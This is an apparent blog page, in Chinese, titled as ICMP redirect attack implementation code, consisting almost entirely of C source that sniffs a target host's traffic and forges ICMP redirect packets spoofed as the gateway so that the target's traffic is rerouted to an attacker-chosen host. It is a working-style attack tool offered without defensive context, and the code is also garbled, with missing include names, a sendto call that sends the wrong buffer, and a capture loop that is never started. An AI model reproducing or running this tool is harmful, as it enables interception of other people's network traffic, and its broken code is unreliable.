信息安全-ICMP重定向攻击实现代码-白红宇

信息安全-ICMP重定向攻击实现代码

阅读量：788 次

发布时间：2019-03-25

本文共 3694 字，大约阅读时间需要 12 分钟。

#include 
   
    
#include 
    
     
#include 
     
      
#include 
      
       
#include 
       
        
#include 
        
          #include 
         
           #define MAX 1024 #define SIZE_ETHERNET 14 char *TARGET_IP; char *REDIRECT_IP; char *GW_IP; struct sockaddr_in target_ip, restrict_ip, gw_ip; struct ip_header { uint8_t version; uint8_t header_length; uint8_t tos; uint8_t total_length; uint16_t id; uint16_t frag_off; uint8_t ttl; uint8_t protocol; uint16_t checksum; struct in_addr source_address; struct in_addr destination_address; }; struct icmp_header { uint8_t type; uint8_t code; uint16_t checksum; struct in_addr gateway_addr; }; uint16_t checksum(uint8_t *buf, int len) { uint32_t sum = 0; uint16_t *cbuf = (uint16_t *)buf; while (len > 1) { sum += *cbuf++; len -= 2; } if (len) { sum += *(uint8_t *)cbuf; } sum = (sum >> 16) + (sum & 0xffff); return ~sum; } void icmp_redirect(int sockfd, const unsigned char *data, int datalen) { struct sockaddr_in dest; struct packet { struct ip_header iph; struct icmp_header icmph; char data[28]; } packet; packet.iph.version = 4; packet.iph.header_length = 5; packet.iph.tos = 0; packet.iph.total_length = htons(56); packet.iph.frag_off = 0; packet.iph.ttl = 255; packet.iph.protocol = IPPROTO_ICMP; packet.iph.checksum = 0; packet.iph.source_address = gw_ip.sin_addr; packet.iph.destination_address = target_ip.sin_addr; packet.icmph.type = ICMP_REDIRECT; packet.icmph.code = ICMP_REDIRECT_HOST; packet.icmph.checksum = 0; packet.icmph.gateway_addr = restrict_ip.sin_addr; memcpy(packet.data, data + SIZE_ETHERNET, 28); packet.iph.checksum = checksum((uint8_t *)&packet.iph, sizeof(packet.iph)); packet.icmph.checksum = checksum((uint8_t *)&packet.icmph, sizeof(packet.icmph) + 28); dest.sin_family = AF_INET; dest.sin_addr = target_ip.sin_addr; sendto(sockfd, (const struct sockaddr *)&dest, sizeof(dest), 0, (const struct sockaddr *)&dest, sizeof(dest)); printf("Redirect packets have been sent....\n\n"); } void getPacket(u_char *args, const struct pcap_pkthdr *pkthdr, const u_char *packet) { int sockfd, res; int one = 1; int *ptr_one = &one; if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) { printf("Error creating socket\n"); return; } res = setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, ptr_one, sizeof(one)); if (res < 0) { printf("Error setting socket options\n"); return; } icmp_redirect(sockfd, packet, 0); } void setup_sniffer(char *dev) { char errbuf[PCAP_ERRBUF_SIZE]; bpf_u_int32 mask, net; if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) { net = 0; mask = 0; } pcap_t *device = pcap_open_live(dev, 65535, 1, 0, errbuf); if (device == NULL) { printf("Error opening device\n"); return; } struct bpf_program filter; char filterstr[50] = {0}; sprintf(filterstr, "src host %s", inet_ntoa(target_ip.sin_addr)); if (pcap_compile(device, &filter, filterstr, 1, net) == -1) { printf("Error compiling filter\n"); return; } pcap_setfilter(device, &filter); printf("Sniffing at %s....\n\n", TARGET_IP); } int main(int argc, const char *argv) { if (argc != 5) { printf("Usage: %s target_ip redirect_ip gateway_ip sniff_dev\n", argv[0]); return 1; } if (inet_aton(argv[1], &target_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[1]); return 1; } if (inet_aton(argv[2], &restrict_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[2]); return 1; } if (inet_aton(argv[3], &gw_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[3]); return 1; } char *dev = argv[4]; printf("Target: %s\nRedirect: %s\nGW: %s\nDevice: %s\n\n", TARGET_IP, REDIRECT_IP, GW_IP, dev); setup_sniffer(dev); }